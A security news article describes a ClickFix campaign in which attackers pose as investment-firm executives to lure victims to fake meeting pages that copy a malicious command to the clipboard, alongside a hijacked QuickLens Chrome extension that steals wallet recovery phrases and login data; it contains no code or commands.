ClickFix New Thread: Hackers Impersonate Investors, Steal Wallets and Data Through Browser Extension

The cybersecurity industry faces an increasing threat as a group of hackers specializing in digital resources has improved the “ClickFix” technique to cause more disruption. They are targeting cryptoassets and the digital Wallets of Moonlock Lab users. This leading security agency revealed that the hackers have skillfully used identity deception tactics to lure victims into revealing important information and causing them to lose their assets.

New Disruption Method: Impersonate a Fund Executive and Lure Victims with a Fake Meeting Link

Cyber terrorists are using “ClickFix” in another form, claiming to be executives from high-risk investment companies such as SolidBit, MegaBit, and Lumax Capital to invite users to participate. The entire process starts with contacting through the LinkedIn platform with communications that appear to be genuine. Victims are lured into interviews or discussions about the projects.

When the victim accepts the invitation, the attacker sends a link pointing to a fake Zoom or Google Meet room. The webpage of this fake meeting room will show a “Check Identity” button from Cloudflare that is also fake. When the user clicks on it, the system will copy a command filled with dangers to the clipboard. These commands will be disguised as commands to set up the meeting, but in reality, they are malicious code designed to compromise the victim’s system.

Browser Extension Hacked: QuickLens Becomes an Attack Weapon for Cryptoassets

In addition to luring victims through fake links, attackers also use another method, which is controlling browser extensions. John Tuckner, founder of Annex Security, revealed that an extension called QuickLens for Chrome had fallen into the hands of attackers on February 1.

After the ownership change for just two weeks, the attackers released a new version of QuickLens that hides harmful code. This version not only supports the ClickFix attack but is also designed to steal user data at the most covert level. Once the user installs the compromised extension, it becomes a double-edged weapon that secretly monitors their behavior.

Information that may be lost and the size of the danger

This fake QuickLens extension had about 7,000 users before it was removed from the Chrome Web Store when officials discovered irregularities. However, losses may have already occurred during the time the extension remained.

The dangerous code hidden in the extension will scan the user’s digital Wallet data and search for recovery account phrases. Not only that, it also retrieves information from the Gmail account, YouTube system, and most importantly, login and payment information on various websites. This information, when combined, will allow the attacker to access the victim’s digital resources silently in the air.

Characteristics of the ClickFix strategy that become more disruptive

Researchers investigating this issue point out that the difficulty in overcoming the ClickFix problem lies in the fact that the protective mechanism is bypassed by the involvement of the victim themselves, as commands are manually copied to the clipboard and manually linger in the terminal. Therefore, the normal system does not detect any anomalies and considers it a routine operation, making it an incredibly effective way to circumvent the protection.

The data from “ClickFix” shows that hackers have improved their tactics to align more closely with proximity, increasing the likelihood of success. Humanity and the establishment of trust have become the biggest vulnerabilities.